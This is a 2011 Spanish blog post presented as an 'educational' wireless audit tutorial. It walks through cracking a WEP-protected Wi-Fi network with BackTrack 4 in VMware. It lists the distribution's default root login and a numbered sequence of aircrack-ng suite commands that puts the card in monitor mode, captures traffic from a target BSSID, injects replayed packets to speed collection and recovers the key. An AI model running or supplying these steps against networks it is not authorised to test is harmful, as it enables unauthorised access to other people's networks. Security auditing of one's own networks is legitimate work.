lunes, abril 11, 2011

Auditoria de redes wireless con Backtrack 4

Este curso es de forma educativa. Aquí tenéis un tutoría de auditoría wireless o hacking como queráis llamarlo usando el backtrack 4, Para ver que tan protegido es la red. No me hago responsable por el mal uso que le den. Esto es con solo fines educativos. La practica esta realizado con el VMware player.


Herramientas:
Software: Windows,VMWare, BackTrack 4
Adaptador USB Wireless-G (para auditoría)

1. Bajar el backtrack 4 lo pueden bajar aquí & aqui & aqui
2. Deben tener vmware instalado lo pueden bajar aquí
3. Recomiendo que después que tengan el backtrac 4 corriendo en el vmware Instalarlo para tenerlo listo y poder hacer el uso en cualquier momento.
4. Empesara a cargar ficheros , les pedirá una clave es la siguiente :
Introducelo todo en minúsculas.

Login : root
Pass : toor


Luego cuando ya todo cargue escribe lo siguiente: startx
Esto es para que se inicie el modo gráfico.

Bueno ahora viene lo bueno, abre una ventana de terminal (o consola) y escribe lo siguiente: airmon-ng
Aquí te va a decir cual es tu tarjeta inalámbrica, lo normal es que salga wlan0, o eth0, o eth1, cosas así por el estilo, tu te vas a dar cuenta de cual es, en mi caso es la wlan0.

"Nota: deben activar el Adaptador USB Wireless-G en el vmware de lo contrario marcara "no wireless extensions."

para decifrar redes con cifrado wep.

1.- airmon-ng  "para ver la interfaz"
1.- airmon-ng start wlan0
2.- airodump-ng mon0
3.- Ctrl+c "es para parar"
4.- airodump-ng -c 1 -w wep - -bssid 00:24:17:8C:59:69 mon0
5.- nueva shell
6.- aireplay-ng -1 0 -a 00:24:17:8C:59:69 mon0
7.- aireplay-ng -3 -b 00:24:17:8C:59:69 mon0
8.- espera que los paquetes lleguen a 30423 0 más
9.- para parar “ctrl+ c”
10.- escribir “dir”
11.- escribir “ aircrack-ng wep-03.cap"

e eso es todo.

ver un ejemplo en el vídeo:



Fuente: leechalleenhjjr & yosthink & Seguridad Wireless

4 comentarios:

Publicar un comentario